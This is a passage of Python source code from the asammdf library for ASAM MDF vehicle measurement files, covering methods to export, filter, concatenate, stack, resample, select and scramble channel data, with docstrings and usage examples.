if hasattr(self, "can_logging_db") and self.can_logging_db:
dropped = {}
for name_ in df.columns:
if name_.endswith("CAN_DataFrame.ID"):
dropped[name_] = pd.Series(
csv_int2hex(df[name_] & 0x1FFFFFFF),
index=df.index,
)
elif name_.endswith("CAN_DataFrame.DataBytes"):
dropped[name_] = pd.Series(
csv_bytearray2hex(df[name_]), index=df.index
)
df = df.drop(columns=list(dropped))
for name_, s in dropped.items():
df[name_] = s
names_row = [df.index.name, *df.columns]
writer.writerow(names_row)
if reduce_memory_usage:
vals = [df.index, *(df[name] for name in df)]
else:
vals = [
df.index.to_list(),
*(df[name].to_list() for name in df),
]
for i, row in enumerate(zip(*vals)):
writer.writerow(row)
if self._callback:
self._callback(i + 1, gp_count)
elif fmt == "mat":
filename = filename.with_suffix(".mat")
if not single_time_base:
mdict = {}
master_name_template = "DGM{}_{}"
channel_name_template = "DG{}_{}"
used_names = UniqueDB()
groups_nr = len(self.virtual_groups)
for i, (group_index, virtual_group) in enumerate(
self.virtual_groups.items()
):
if self._terminate:
return
channels = self.included_channels(group_index)[group_index]
if not channels:
continue
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in channels.items()
for ch_index in channel_indexes
]
if not channels:
continue
channels = self.select(
channels,
ignore_value2text_conversions=ignore_value2text_conversions,
raw=raw,
)
master = channels[0].copy()
master.samples = master.timestamps
channels.insert(0, master)
for j, sig in enumerate(channels):
if j == 0:
channel_name = master_name_template.format(i, "timestamps")
else:
if use_display_names:
channel_name = sig.display_name or sig.name
else:
channel_name = sig.name
channel_name = channel_name_template.format(i, channel_name)
channel_name = matlab_compatible(channel_name)
channel_name = used_names.get_unique_name(channel_name)
if sig.samples.dtype.names:
sig.samples.dtype.names = [
matlab_compatible(name)
for name in sig.samples.dtype.names
]
mdict[channel_name] = sig.samples
if self._callback:
self._callback(i + 1, groups_nr + 1)
else:
used_names = UniqueDB()
mdict = {}
count = len(df.columns)
for i, name in enumerate(df.columns):
channel_name = matlab_compatible(name)
channel_name = used_names.get_unique_name(channel_name)
mdict[channel_name] = df[name].values
if hasattr(mdict[channel_name].dtype, "categories"):
mdict[channel_name] = np.array(mdict[channel_name], dtype="S")
if self._callback:
self._callback(i + 1 + count, count * 2)
mdict["timestamps"] = df.index.values
if self._callback:
self._callback(80, 100)
if format == "7.3":
savemat(
str(filename),
mdict,
long_field_names=True,
format="7.3",
delete_unused_variables=False,
oned_as=oned_as,
structured_numpy_ndarray_as_struct=True,
)
else:
savemat(
str(filename),
mdict,
long_field_names=True,
oned_as=oned_as,
do_compression=bool(compression),
)
if self._callback:
self._callback(100, 100)
elif fmt == "parquet":
filename = filename.with_suffix(".parquet")
if compression:
write_parquet(filename, df, compression=compression)
else:
write_parquet(filename, df)
else:
message = (
'Unsupported export type "{}". '
'Please select "csv", "hdf5", "mat" or "parquet"'
)
message = message.format(fmt)
logger.warning(message)
def filter(self, channels, version=None):
"""return new *MDF* object that contains only the channels listed in
*channels* argument
Parameters
----------
channels : list
list of items to be filtered; each item can be :
* a channel name string
* (channel name, group index, channel index) list or tuple
* (channel name, group index) list or tuple
* (None, group index, channel index) list or tuple
version : str
new mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10',
'3.20', '3.30', '4.00', '4.10', '4.11', '4.20'); default *None* and in this
case the original file version is used
Returns
-------
mdf : MDF
new *MDF* file
Examples
--------
>>> from asammdf import MDF, Signal
>>> import numpy as np
>>> t = np.arange(5)
>>> s = np.ones(5)
>>> mdf = MDF()
>>> for i in range(4):
... sigs = [Signal(s*(i*10+j), t, name='SIG') for j in range(1,4)]
... mdf.append(sigs)
...
>>> filtered = mdf.filter(['SIG', ('SIG', 3, 1), ['SIG', 2], (None, 1, 2)])
>>> for gp_nr, ch_nr in filtered.channels_db['SIG']:
... print(filtered.get(group=gp_nr, index=ch_nr))
...
<Signal SIG:
samples=[ 1. 1. 1. 1. 1.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
<Signal SIG:
samples=[ 31. 31. 31. 31. 31.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
<Signal SIG:
samples=[ 21. 21. 21. 21. 21.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
<Signal SIG:
samples=[ 12. 12. 12. 12. 12.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
"""
if version is None:
version = self.version
else:
version = validate_version_argument(version)
# group channels by group index
gps = self.included_channels(channels=channels)
mdf = MDF(
version=version,
**self._kwargs,
)
integer_interpolation_mode = self._integer_interpolation
float_interpolation_mode = self._float_interpolation
mdf.configure(from_other=self)
mdf.header.start_time = self.header.start_time
self.configure(copy_on_get=False)
if self.name:
origin = self.name.name
else:
origin = "New MDF"
groups_nr = len(gps)
if self._callback:
self._callback(0, groups_nr)
for i, (group_index, groups) in enumerate(gps.items()):
for idx, sigs in enumerate(
self._yield_selected_signals(
group_index, groups=groups, version=version
)
):
if not sigs:
break
if idx == 0:
if sigs:
cg = self.groups[group_index].channel_group
cg_nr = mdf.append(
sigs,
common_timebase=True,
)
MDF._transfer_channel_group_data(
mdf.groups[cg_nr].channel_group, cg
)
else:
break
else:
mdf.extend(cg_nr, sigs)
if self._callback:
self._callback(i + 1, groups_nr)
if self._terminate:
return
self.configure(copy_on_get=True)
mdf._transfer_metadata(self, message=f"Filtered from {self.name}")
if self._callback:
mdf._callback = mdf._mdf._callback = self._callback
return mdf
def iter_get(
self,
name=None,
group=None,
index=None,
raster=None,
samples_only=False,
raw=False,
):
"""iterator over a channel
This is useful in case of large files with a small number of channels.
If the *raster* keyword argument is not *None* the output is
interpolated accordingly
Parameters
----------
name : string
name of channel
group : int
0-based group index
index : int
0-based channel index
raster : float
time raster in seconds
samples_only : bool
if *True* return only the channel samples as numpy array; if
*False* return a *Signal* object
raw : bool
return channel samples without applying the conversion rule; default
`False`
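Examples
--------
Process one channel fragment by fragment instead of loading it at once
('EngineSpeed' and *process* are placeholders):

>>> for sig in mdf.iter_get('EngineSpeed'):
...     process(sig)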
"""
gp_nr, ch_nr = self._validate_channel_selection(name, group, index)
grp = self.groups[gp_nr]
data = self._load_data(grp)
for fragment in data:
yield self.get(
group=gp_nr,
index=ch_nr,
raster=raster,
samples_only=samples_only,
data=fragment,
raw=raw,
)
@staticmethod
def concatenate(
files,
version="4.10",
sync=True,
add_samples_origin=False,
direct_timestamp_continuation=False,
**kwargs,
):
"""concatenates several files. The files
must have the same internal structure (same number of groups, and same
channels in each group)
Parameters
----------
files : list | tuple
list of *MDF* file names or *MDF*, zipfile.ZipFile, bz2.BZ2File or gzip.GzipFile
instances
.. versionchanged:: 6.2.0
added support for zipfile.ZipFile, bz2.BZ2File and gzip.GzipFile
version : str
merged file version
sync : bool
sync the files based on the start of measurement, default *True*
add_samples_origin : bool
option to create a new "__samples_origin" channel that will hold
the index of the measurement from where each timestamp originated
direct_timestamp_continuation (False) : bool
the time stamps from the next file will be added right after the last
time stamp from the previous file; default False
.. versionadded:: 6.0.0
kwargs :
use_display_names (False) : bool
Examples
--------
>>> conc = MDF.concatenate(
[
'path/to/file.mf4',
MDF(BytesIO(data)),
MDF(zipfile.ZipFile('data.zip')),
MDF(bz2.BZ2File('path/to/data.bz2', 'rb')),
MDF(gzip.GzipFile('path/to/data.gzip', 'rb')),
],
version='4.00',
sync=False,
)
Returns
-------
concatenate : MDF
new *MDF* object with concatenated channels
Raises
------
MdfException : if there are inconsistencies between the files
"""
if not files:
raise MdfException("No files given for merge")
callback = kwargs.get("callback", None)
if callback:
callback(0, 100)
mdf_nr = len(files)
input_types = [isinstance(mdf, MDF) for mdf in files]
use_display_names = kwargs.get("use_display_names", False)
versions = []
if sync:
timestamps = []
for file in files:
if isinstance(file, MDF):
timestamps.append(file.header.start_time)
versions.append(file.version)
else:
if is_file_like(file):
ts, version = get_measurement_timestamp_and_version(file, "io")
timestamps.append(ts)
versions.append(version)
else:
with open(file, "rb") as mdf:
ts, version = get_measurement_timestamp_and_version(mdf, file)
timestamps.append(ts)
versions.append(version)
try:
oldest = min(timestamps)
except TypeError:
timestamps = [
timestamp.astimezone(timezone.utc) for timestamp in timestamps
]
oldest = min(timestamps)
offsets = [(timestamp - oldest).total_seconds() for timestamp in timestamps]
offsets = [offset if offset > 0 else 0 for offset in offsets]
else:
file = files[0]
if isinstance(file, MDF):
oldest = file.header.start_time
versions.append(file.version)
else:
if is_file_like(file):
ts, version = get_measurement_timestamp_and_version(file, "io")
versions.append(version)
else:
with open(file, "rb") as mdf:
ts, version = get_measurement_timestamp_and_version(mdf, file)
versions.append(version)
oldest = ts
offsets = [0 for _ in files]
included_channel_names = []
cg_map = {}
if add_samples_origin:
origin_conversion = {}
for i, mdf in enumerate(files):
origin_conversion[f"val_{i}"] = i
if isinstance(mdf, MDF):
origin_conversion[f"text_{i}"] = str(mdf.name)
else:
origin_conversion[f"text_{i}"] = str(mdf)
origin_conversion = from_dict(origin_conversion)
for mdf_index, (offset, mdf) in enumerate(zip(offsets, files)):
if not isinstance(mdf, MDF):
mdf = MDF(
mdf,
use_display_names=use_display_names,
)
if mdf_index == 0:
version = validate_version_argument(version)
kwargs = dict(mdf._kwargs)
kwargs.pop("callback", None)
merged = MDF(
version=version,
callback=callback,
**kwargs,
)
integer_interpolation_mode = mdf._integer_interpolation
float_interpolation_mode = mdf._float_interpolation
merged.configure(from_other=mdf)
merged.header.start_time = oldest
mdf.configure(copy_on_get=False)
if mdf_index == 0:
last_timestamps = [None for gp in mdf.virtual_groups]
groups_nr = len(last_timestamps)
else:
if len(mdf.virtual_groups) != groups_nr:
raise MdfException(
f"internal structure of file <{mdf.name}> is different; different channel groups count"
)
for i, group_index in enumerate(mdf.virtual_groups):
included_channels = mdf.included_channels(group_index)[group_index]
if mdf_index == 0:
included_channel_names.append(
[
mdf.groups[gp_index].channels[ch_index].name
for gp_index, channels in included_channels.items()
for ch_index in channels
]
)
different_channel_order = False
else:
names = [
mdf.groups[gp_index].channels[ch_index].name
for gp_index, channels in included_channels.items()
for ch_index in channels
]
different_channel_order = False
if names != included_channel_names[i]:
if sorted(names) != sorted(included_channel_names[i]):
raise MdfException(
f"internal structure of file {mdf_index} is different; different channels"
)
else:
original_names = included_channel_names[i]
different_channel_order = True
remap = [original_names.index(name) for name in names]
if not included_channels:
continue
idx = 0
last_timestamp = last_timestamps[i]
first_timestamp = None
original_first_timestamp = None
for idx, signals in enumerate(
mdf._yield_selected_signals(group_index, groups=included_channels)
):
if not signals:
break
if mdf_index == 0 and idx == 0:
first_signal = signals[0]
if len(first_signal):
if offset > 0:
timestamps = first_signal.timestamps + offset
for sig in signals:
sig.timestamps = timestamps
last_timestamp = first_signal.timestamps[-1]
first_timestamp = first_signal.timestamps[0]
original_first_timestamp = first_timestamp
if add_samples_origin:
signals.append(
Signal(
samples=np.ones(len(first_signal), dtype="<u2")
* mdf_index,
timestamps=first_signal.timestamps,
conversion=origin_conversion,
name="__samples_origin",
)
)
cg = mdf.groups[group_index].channel_group
cg_nr = merged.append(
signals,
common_timebase=True,
)
MDF._transfer_channel_group_data(
merged.groups[cg_nr].channel_group, cg
)
cg_map[group_index] = cg_nr
else:
if different_channel_order:
new_signals = [None for _ in signals]
if idx == 0:
for new_index, sig in zip(remap, signals):
new_signals[new_index] = sig
else:
for new_index, sig in zip(remap, signals[1:]):
new_signals[new_index + 1] = sig
new_signals[0] = signals[0]
signals = new_signals
if idx == 0:
signals = [(signals[0].timestamps, None)] + [
(sig.samples, sig.invalidation_bits) for sig in signals
]
master = signals[0][0]
_copied = False
if len(master):
if original_first_timestamp is None:
original_first_timestamp = master[0]
if offset > 0:
master = master + offset
_copied = True
if last_timestamp is None:
last_timestamp = master[-1]
else:
if (
last_timestamp >= master[0]
or direct_timestamp_continuation
):
if len(master) >= 2:
delta = master[1] - master[0]
else:
delta = 0.001
if _copied:
master -= master[0]
else:
master = master - master[0]
_copied = True
master += last_timestamp + delta
last_timestamp = master[-1]
signals[0] = master, None
if add_samples_origin:
signals.append(
(
np.ones(len(master), dtype="<u2") * mdf_index,
None,
)
)
cg_nr = cg_map[group_index]
merged.extend(cg_nr, signals)
if first_timestamp is None:
first_timestamp = master[0]
last_timestamps[i] = last_timestamp
mdf.configure(copy_on_get=True)
if mdf_index == 0:
merged._transfer_metadata(mdf)
if not input_types[mdf_index]:
mdf.close()
if callback:
callback(i + 1 + mdf_index * groups_nr, groups_nr * mdf_nr)
if MDF._terminate:
return
try:
merged._process_bus_logging()
except:
pass
return merged
@staticmethod
def stack(files, version="4.10", sync=True, **kwargs):
"""stack several files and return the stacked *MDF* object
Parameters
----------
files : list | tuple
list of *MDF* file names or *MDF*, zipfile.ZipFile, bz2.BZ2File or gzip.GzipFile
instances
.. versionchanged:: 6.2.0
added support for zipfile.ZipFile, bz2.BZ2File and gzip.GzipFile
version : str
merged file version
sync : bool
sync the files based on the start of measurement, default *True*
kwargs :
use_display_names (False) : bool
Examples
--------
>>> stacked = MDF.stack(
[
'path/to/file.mf4',
MDF(BytesIO(data)),
MDF(zipfile.ZipFile('data.zip')),
MDF(bz2.BZ2File('path/to/data.bz2', 'rb')),
MDF(gzip.GzipFile('path/to/data.gzip', 'rb')),
],
version='4.00',
sync=False,
)
Returns
-------
stacked : MDF
new *MDF* object with stacked channels
"""
if not files:
raise MdfException("No files given for stack")
version = validate_version_argument(version)
callback = kwargs.get("callback", None)
use_display_names = kwargs.get("use_display_names", False)
files_nr = len(files)
input_types = [isinstance(mdf, MDF) for mdf in files]
if callback:
callback(0, files_nr)
if sync:
timestamps = []
for file in files:
if isinstance(file, MDF):
timestamps.append(file.header.start_time)
else:
if is_file_like(file):
ts, version = get_measurement_timestamp_and_version(file, "io")
timestamps.append(ts)
else:
with open(file, "rb") as mdf:
ts, version = get_measurement_timestamp_and_version(mdf, file)
timestamps.append(ts)
try:
oldest = min(timestamps)
except TypeError:
timestamps = [
timestamp.astimezone(timezone.utc) for timestamp in timestamps
]
oldest = min(timestamps)
offsets = [(timestamp - oldest).total_seconds() for timestamp in timestamps]
else:
offsets = [0 for file in files]
for mdf_index, (offset, mdf) in enumerate(zip(offsets, files)):
if not isinstance(mdf, MDF):
mdf = MDF(mdf, use_display_names=use_display_names)
if mdf_index == 0:
version = validate_version_argument(version)
kwargs = dict(mdf._kwargs)
kwargs.pop("callback", None)
stacked = MDF(
version=version,
callback=callback, **kwargs,
)
integer_interpolation_mode = mdf._integer_interpolation
float_interpolation_mode = mdf._float_interpolation
stacked.configure(from_other=mdf)
if sync:
stacked.header.start_time = oldest
else:
stacked.header.start_time = mdf.header.start_time
mdf.configure(copy_on_get=False)
for i, group in enumerate(mdf.virtual_groups):
dg_cntr = None
included_channels = mdf.included_channels(group)[group]
if not included_channels:
continue
for idx, signals in enumerate(
mdf._yield_selected_signals(
group, groups=included_channels, version=version
)
):
if not signals:
break
if idx == 0:
if sync:
timestamps = signals[0].timestamps + offset
for sig in signals:
sig.timestamps = timestamps
cg = mdf.groups[group].channel_group
dg_cntr = stacked.append(
signals,
common_timebase=True,
)
MDF._transfer_channel_group_data(
stacked.groups[dg_cntr].channel_group, cg
)
else:
master = signals[0][0]
if sync:
master = master + offset
signals[0] = master, None
stacked.extend(dg_cntr, signals)
if dg_cntr is not None:
for index in range(dg_cntr, len(stacked.groups)):
stacked.groups[
index
].channel_group.comment = (
f'stacked from channel group {i} of "{mdf.name.parent}"'
)
if callback:
callback(mdf_index, files_nr)
mdf.configure(copy_on_get=True)
if mdf_index == 0:
stacked._transfer_metadata(mdf)
if not input_types[mdf_index]:
mdf.close()
if MDF._terminate:
return
try:
stacked._process_bus_logging()
except:
pass
return stacked
def iter_channels(self, skip_master=True, copy_master=True):
"""generator that yields a *Signal* for each non-master channel
Parameters
----------
skip_master : bool
do not yield master channels; default *True*
copy_master : bool
copy master for each yielded channel
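Examples
--------
Collect the unit of every non-master channel:

>>> units = {sig.name: sig.unit for sig in mdf.iter_channels()}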
"""
for index in self.virtual_groups:
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in self.included_channels(index)[
index
].items()
for ch_index in channel_indexes
]
channels = self.select(channels, copy_master=copy_master)
yield from channels
def iter_groups(
self,
raster=None,
time_from_zero=True,
empty_channels="skip",
keep_arrays=False,
use_display_names=False,
time_as_date=False,
reduce_memory_usage=False,
raw=False,
ignore_value2text_conversions=False,
only_basenames=False,
):
"""generator that yields channel groups as pandas DataFrames. If there
are multiple occurrences for the same channel name inside a channel
group, then a counter will be used to make the names unique
(<original_name>_<counter>)
Parameters
----------
use_display_names : bool
use display name instead of standard channel name, if available.
.. versionadded:: 5.21.0
reduce_memory_usage : bool
reduce memory usage by converting all float columns to float32 and
searching for minimum dtype that can represent the values found
in integer columns; default *False*
.. versionadded:: 5.21.0
raw (False) : bool
the dataframe will contain the raw channel values
.. versionadded:: 5.21.0
ignore_value2text_conversions (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
.. versionadded:: 5.21.0
keep_arrays (False) : bool
keep arrays and structure channels as well as the
component channels. If *True* this can be very slow. If *False*
only the component channels are saved, and their names will be
prefixed with the parent channel.
.. versionadded:: 5.21.0
empty_channels ("skip") : str
behaviour for channels without samples; the options are *skip* or
*zeros*; default is *skip*
.. versionadded:: 5.21.0
only_basenames (False) : bool
use just the field names, without prefix, for structures and channel
arrays
.. versionadded:: 5.21.0
raster : float | np.array | str
new raster that can be
* a float step value
* a channel name whose timestamps will be used as raster (starting with asammdf 5.5.0)
* an array (starting with asammdf 5.5.0)
see `resample` for examples of using this argument
.. versionadded:: 5.21.0
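Examples
--------
Write each channel group to its own CSV file (output names are placeholders):

>>> for i, df in enumerate(mdf.iter_groups(time_from_zero=True)):
...     df.to_csv(f'group_{i}.csv')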
"""
for i in self.virtual_groups:
yield self.get_group(
i,
raster=None,
time_from_zero=time_from_zero,
empty_channels=empty_channels,
keep_arrays=keep_arrays,
use_display_names=use_display_names,
time_as_date=time_as_date,
reduce_memory_usage=reduce_memory_usage,
raw=raw,
ignore_value2text_conversions=ignore_value2text_conversions,
only_basenames=only_basenames,
)
def resample(self, raster, version=None, time_from_zero=False):
"""resample all channels using the given raster. See *configure* to select
the interpolation method for integer channels
Parameters
----------
raster : float | np.array | str
new raster that can be
* a float step value
* a channel name whose timestamps will be used as raster (starting with asammdf 5.5.0)
* an array (starting with asammdf 5.5.0)
version : str
new mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10',
'3.20', '3.30', '4.00', '4.10', '4.11', '4.20'); default *None* and
in this case the original file version is used
time_from_zero : bool
start time stamps from 0s in the cut measurement
Returns
-------
mdf : MDF
new *MDF* with resampled channels
Examples
--------
>>> from asammdf import MDF, Signal
>>> import numpy as np
>>> mdf = MDF()
>>> sig = Signal(name='S1', samples=[1,2,3,4], timestamps=[1,2,3,4])
>>> mdf.append(sig)
>>> sig = Signal(name='S2', samples=[1,2,3,4], timestamps=[1.1, 3.5, 3.7, 3.9])
>>> mdf.append(sig)
>>> resampled = mdf.resample(raster=0.1)
>>> resampled.select(['S1', 'S2'])
[<Signal S1:
samples=[1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3 3 3 3 3 3 3 3 3 4]
timestamps=[1. 1.1 1.2 1.3 1.4 1.5 1.6 1.7 1.8 1.9 2. 2.1 2.2 2.3 2.4 2.5 2.6 2.7
2.8 2.9 3. 3.1 3.2 3.3 3.4 3.5 3.6 3.7 3.8 3.9 4. ]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
, <Signal S2:
samples=[1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 2 3 3 4 4]
timestamps=[1. 1.1 1.2 1.3 1.4 1.5 1.6 1.7 1.8 1.9 2. 2.1 2.2 2.3 2.4 2.5 2.6 2.7
2.8 2.9 3. 3.1 3.2 3.3 3.4 3.5 3.6 3.7 3.8 3.9 4. ]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
]
>>> resampled = mdf.resample(raster='S2')
>>> resampled.select(['S1', 'S2'])
[<Signal S1:
samples=[1 3 3 3]
timestamps=[1.1 3.5 3.7 3.9]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
, <Signal S2:
samples=[1 2 3 4]
timestamps=[1.1 3.5 3.7 3.9]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
]
>>> resampled = mdf.resample(raster=[1.9, 2.0, 2.1])
>>> resampled.select(['S1', 'S2'])
[<Signal S1:
samples=[1 2 2]
timestamps=[1.9 2. 2.1]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
, <Signal S2:
samples=[1 1 1]
timestamps=[1.9 2. 2.1]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
]
>>> resampled = mdf.resample(raster='S2', time_from_zero=True)
>>> resampled.select(['S1', 'S2'])
[<Signal S1:
samples=[1 3 3 3]
timestamps=[0. 2.4 2.6 2.8]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
, <Signal S2:
samples=[1 2 3 4]
timestamps=[0. 2.4 2.6 2.8]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
]
"""
if version is None:
version = self.version
else:
version = validate_version_argument(version)
mdf = MDF(
version=version,
**self._kwargs,
)
integer_interpolation_mode = self._integer_interpolation
float_interpolation_mode = self._float_interpolation
mdf.configure(from_other=self)
mdf.header.start_time = self.header.start_time
groups_nr = len(self.virtual_groups)
if self._callback:
self._callback(0, groups_nr)
try:
raster = float(raster)
assert raster > 0
except (TypeError, ValueError):
if isinstance(raster, str):
raster = self.get(raster).timestamps
else:
raster = np.array(raster)
else:
raster = master_using_raster(self, raster)
if time_from_zero and len(raster):
delta = raster[0]
new_raster = raster - delta
t_epoch = self.header.start_time.timestamp() + delta
mdf.header.start_time = datetime.fromtimestamp(t_epoch)
else:
delta = 0
new_raster = None
mdf.header.start_time = self.header.start_time
for i, (group_index, virtual_group) in enumerate(self.virtual_groups.items()):
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in self.included_channels(group_index)[
group_index
].items()
for ch_index in channel_indexes
]
sigs = self.select(channels, raw=True)
sigs = [
sig.interp(
raster,
integer_interpolation_mode=integer_interpolation_mode,
float_interpolation_mode=float_interpolation_mode,
)
for sig in sigs
]
if new_raster is not None:
for sig in sigs:
if len(sig):
sig.timestamps = new_raster
cg = self.groups[group_index].channel_group
dg_cntr = mdf.append(
sigs,
common_timebase=True,
)
MDF._transfer_channel_group_data(mdf.groups[dg_cntr].channel_group, cg)
if self._callback:
self._callback(i + 1, groups_nr)
if self._terminate:
return
if self._callback:
self._callback(groups_nr, groups_nr)
mdf._transfer_metadata(self, message=f"Resampled from {self.name}")
if self._callback:
mdf._callback = mdf._mdf._callback = self._callback
return mdf
def select(
self,
channels,
record_offset=0,
raw=False,
copy_master=True,
ignore_value2text_conversions=False,
record_count=None,
validate=False,
):
"""retrieve the channels listed in *channels* argument as *Signal*
objects
.. note:: the *dataframe* argument was removed in version 5.8.0
use the ``to_dataframe`` method instead
Parameters
----------
channels : list
list of items to be filtered; each item can be :
* a channel name string
* (channel name, group index, channel index) list or tuple
* (channel name, group index) list or tuple
* (None, group index, channel index) list or tuple
record_offset : int
record number offset; optimization to get the last part of signal samples
raw : bool
get raw channel samples; default *False*
copy_master : bool
option to get a new timestamps array for each selected Signal or to
use a shared array for channels of the same channel group; default *True*
ignore_value2text_conversions (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
.. versionadded:: 5.8.0
validate (False) : bool
consider the invalidation bits
.. versionadded:: 5.16.0
Returns
-------
signals : list
list of *Signal* objects based on the input channel list
Examples
--------
>>> from asammdf import MDF, Signal
>>> import numpy as np
>>> t = np.arange(5)
>>> s = np.ones(5)
>>> mdf = MDF()
>>> for i in range(4):
... sigs = [Signal(s*(i*10+j), t, name='SIG') for j in range(1,4)]
... mdf.append(sigs)
...
>>> # select SIG group 0 default index 1 default, SIG group 3 index 1, SIG group 2 index 1 default and channel index 2 from group 1
...
>>> mdf.select(['SIG', ('SIG', 3, 1), ['SIG', 2], (None, 1, 2)])
[<Signal SIG:
samples=[ 1. 1. 1. 1. 1.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
, <Signal SIG:
samples=[ 31. 31. 31. 31. 31.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
, <Signal SIG:
samples=[ 21. 21. 21. 21. 21.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
, <Signal SIG:
samples=[ 12. 12. 12. 12. 12.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
]
"""
virtual_groups = self.included_channels(
channels=channels, minimal=False, skip_master=False
)
output_signals = {}
for virtual_group, groups in virtual_groups.items():
cycles_nr = self._mdf.virtual_groups[virtual_group].cycles_nr
pairs = [
(gp_index, ch_index)
for gp_index, channel_indexes in groups.items()
for ch_index in channel_indexes
]
if record_count is None:
cycles = cycles_nr - record_offset
else:
if cycles_nr < record_count + record_offset:
cycles = cycles_nr - record_offset
else:
cycles = record_count
signals = []
current_pos = 0
for idx, sigs in enumerate(
self._yield_selected_signals(
virtual_group,
groups=groups,
record_offset=record_offset,
record_count=record_count,
)
):
if not sigs:
break
if idx == 0:
next_pos = current_pos + len(sigs[0])
master = np.empty(cycles, dtype=sigs[0].timestamps.dtype)
master[current_pos:next_pos] = sigs[0].timestamps
for sig in sigs:
shape = (cycles,) + sig.samples.shape[1:]
signal = np.empty(shape, dtype=sig.samples.dtype)
signal[current_pos:next_pos] = sig.samples
sig.samples = signal
signals.append(sig)
if sig.invalidation_bits is not None:
inval = np.empty(cycles, dtype=sig.invalidation_bits.dtype)
inval[current_pos:next_pos] = sig.invalidation_bits
sig.invalidation_bits = inval
else:
sig, _ = sigs[0]
next_pos = current_pos + len(sig)
master[current_pos:next_pos] = sig
for signal, (sig, inval) in zip(signals, sigs[1:]):
signal.samples[current_pos:next_pos] = sig
if signal.invalidation_bits is not None:
signal.invalidation_bits[current_pos:next_pos] = inval
current_pos = next_pos
for signal, pair in zip(signals, pairs):
signal.timestamps = master
output_signals[pair] = signal
indexes = []
for item in channels:
if not isinstance(item, (list, tuple)):
item = [item]
indexes.append(self._validate_channel_selection(*item))
signals = [output_signals[pair] for pair in indexes]
if copy_master:
for signal in signals:
signal.timestamps = signal.timestamps.copy()
if not raw:
if ignore_value2text_conversions:
for signal in signals:
conversion = signal.conversion
if conversion:
samples = conversion.convert(signal.samples)
if samples.dtype.kind not in "US":
signal.samples = samples
signal.raw = True
signal.conversion = None
else:
for signal in signals:
conversion = signal.conversion
if conversion:
signal.samples = conversion.convert(signal.samples)
signal.raw = False
signal.conversion = None
if signal.samples.dtype.kind == "S":
signal.encoding = (
"utf-8" if self.version >= "4.00" else "latin-1"
)
if validate:
signals = [sig.validate() for sig in signals]
return signals
@staticmethod
def scramble(name, skip_attachments=False, **kwargs):
"""scramble text blocks and keep original file structure
Parameters
----------
name : str | pathlib.Path
file name
skip_attachments : bool
skip scrambling of attachments data if True
.. versionadded:: 5.9.0
Returns
-------
name : str
scrambled file name
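Examples
--------
A minimal usage sketch (the file name is hypothetical); the scrambled
copy is written next to the original file:
>>> scrambled_path = MDF.scramble('measurement.mf4')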
"""
name = Path(name)
mdf = MDF(name)
texts = {}
callback = kwargs.get("callback", None)
if callback:
callback(0, 100)
count = len(mdf.groups)
if mdf.version >= "4.00":
try:
ChannelConversion = ChannelConversionV4
stream = mdf._file
if mdf.header.comment_addr:
stream.seek(mdf.header.comment_addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[mdf.header.comment_addr] = randomized_string(size)
for fh in mdf.file_history:
addr = fh.comment_addr
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
for ev in mdf.events:
for addr in (ev.comment_addr, ev.name_addr):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
for at in mdf.attachments:
for addr in (at.comment_addr, at.file_name_addr):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
if not skip_attachments and at.embedded_data:
texts[at.address + v4c.AT_COMMON_SIZE] = randomized_string(
at.embedded_size
)
for idx, gp in enumerate(mdf.groups, 1):
addr = gp.data_group.comment_addr
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
cg = gp.channel_group
for addr in (cg.acq_name_addr, cg.comment_addr):
if cg.flags & v4c.FLAG_CG_BUS_EVENT:
continue
if addr and addr not in texts:
stream.seek(addr + 8)
